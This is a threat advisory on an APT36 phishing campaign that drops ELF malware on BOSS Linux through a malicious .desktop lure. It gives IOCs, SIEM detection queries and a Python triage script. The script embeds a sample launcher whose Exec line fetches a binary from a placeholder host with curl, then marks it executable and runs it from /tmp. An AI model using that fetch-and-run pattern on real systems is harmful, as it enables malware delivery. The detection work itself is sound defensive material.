Phishing Attack: Deploying Malware on Indian Defense BOSS Linux

    Date: 07/07/2025

    Severity: Critical

    Summary

    Our team uncovered a cyber-espionage campaign by APT36 (Transparent Tribe), targeting Indian defense personnel. In a tactical shift, the group now focuses on Linux systems, especially BOSS Linux used by Indian government agencies. Phishing emails deliver a ZIP file containing a malicious .desktop shortcut that executes on user interaction. It opens a decoy PowerPoint file while silently downloading and running a malicious ELF payload to compromise the system.
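As an added defender-side example that is not part of this advisory or the referenced CYFIRMA research, the Python triage below applies simple heuristics to a `.desktop` launcher of the kind described above (document-like name, `Exec=` that opens a decoy and fetches then runs a binary). The sample launcher, its URL, file names and paths are constructed placeholders, not indicators from this page.

```python
import re
from configparser import ConfigParser, Error as ConfigError

# Constructed sample of the lure type the advisory describes: a launcher named
# like a document whose Exec= opens a decoy and fetches/runs a binary.
# URL, file names and paths are placeholders, not the advisory's IOCs.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Advisory.pptx
Icon=libreoffice-impress
Terminal=false
Exec=bash -c "xdg-open ./decoy.pptx; curl -s https://placeholder.invalid/x.elf -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x &"
"""

DOC_NAME = re.compile(r"\.(pptx?|docx?|xlsx?|pdf)$", re.I)  # Name= looks like a document
FETCH = re.compile(r"\b(curl|wget)\b")                        # network download in Exec=
STAGE_RUN = re.compile(r"chmod\s+\+x|/tmp/\S+\s*(&|;|$)")     # mark executable / run from /tmp
OPENER = re.compile(r"\b(xdg-open|libreoffice|soffice)\b")    # decoy document opener


def triage_desktop(text: str) -> list[str]:
    """Return findings for one .desktop file's contents; empty means no heuristic fired."""
    cp = ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except ConfigError:
        return ["file does not parse as a .desktop entry"]
    if "Desktop Entry" not in cp:
        return ["missing [Desktop Entry] group"]
    entry = cp["Desktop Entry"]
    name, exec_line = entry.get("Name", ""), entry.get("Exec", "")
    hidden = entry.get("Terminal", "").lower() == "false"  # no terminal window is shown

    findings = []
    if DOC_NAME.search(name):
        findings.append("launcher name masquerades as a document")
    if FETCH.search(exec_line):
        findings.append("Exec fetches content from the network"
                        + (" with the terminal hidden" if hidden else ""))
        if STAGE_RUN.search(exec_line):
            findings.append("Exec stages and runs a downloaded file")
        if OPENER.search(exec_line):
            findings.append("Exec opens a decoy document beside the fetch")
    return findings


if __name__ == "__main__":
    for finding in triage_desktop(SAMPLE_DESKTOP):
        print("-", finding)
```

Run it over every `.desktop` extracted from a suspicious ZIP before anyone double-clicks it; an empty result only means these particular heuristics did not fire.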

    Indicators of Compromise (IOC) List

    Domains / URLs:

    https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx

    https://govin.sorlastore.com/uploads/BOSS.elf

    sorlastore.com

    modgovin.onthewifi.com

    IP Address:

    101.99.92.182

    Hashes (SHA-256):

    608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a

    ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab

    e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064

    167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domains / URLs:

    domainname like "https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx" or url like "https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx" or siteurl like "https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx" or domainname like "https://govin.sorlastore.com/uploads/BOSS.elf" or url like "https://govin.sorlastore.com/uploads/BOSS.elf" or siteurl like "https://govin.sorlastore.com/uploads/BOSS.elf" or domainname like "modgovin.onthewifi.com" or url like "modgovin.onthewifi.com" or siteurl like "modgovin.onthewifi.com" or domainname like "sorlastore.com" or url like "sorlastore.com" or siteurl like "sorlastore.com"

    IP Address:

    dstipaddress IN ("101.99.92.182") or srcipaddress IN ("101.99.92.182")

    Hashes (SHA-256):

    sha256hash IN ("608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a","e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064","ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab","167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f")

    Reference:

    https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/


    Tags

    Malware, Phishing, APT36, Transparent Tribe, India, Defense Industrial Base, Government Services and Facilities
